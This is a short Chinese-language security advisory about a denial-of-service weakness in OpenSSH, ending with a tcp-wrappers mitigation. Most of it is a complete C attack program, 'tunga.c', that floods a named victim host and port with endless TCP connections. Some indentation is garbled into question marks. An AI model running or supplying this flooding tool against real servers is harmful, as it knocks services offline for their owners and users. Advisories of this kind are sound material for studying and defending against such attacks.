詳細描述
openssh存在拒絕服務攻擊，使用如下操作：

$ ssh user@somehost.com
ssh_exchange_identification: Connection closed by remote host

可以導致服務停止。

測試代碼
--[ Code ]--

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>

int main (int argc, char *argv[]) {

??int sd, rc;
??struct sockaddr_in localAddr, servAddr;
??struct linger ling;
??struct hostent *h;

??if(argc < 3) {
????printf("tunga.c - OpenSSH DoS Attack\n");
????printf("by DrBrain <drbrain@phibernet.org>\n");
????printf("Phibernet Information Network < http://www.phibernet.org
>\n\n");
????printf("Usage: %s <victim> <port>\n\n",argv[0]);
????exit(1);
??}

??h = gethostbyname(argv[1]);
??if(h==NULL) {
????printf("%s: Unknown Host '%s'\n",argv[0],argv[1]);
????exit(1);
??}

??for(;;) {
????servAddr.sin_family = h->h_addrtype;
????memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0],
h->h_length);
????servAddr.sin_port = htons(atoi(argv[2]));

????sd = socket(AF_INET, SOCK_STREAM, 0);
????if(sd<0) {
??????perror("Cannot Open Socket ");
??????exit(1);
????}

????rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr));
????if(rc<0) {
??????perror("Cannot Connect ");
??????exit(1);
????}
??}
??exit(0);
}

解決方案
編譯SSH服務程序支持libwrap(Tcp-wrappers)，然后在/etc/hosts.{allow,deny} 中增加對源地址的控制。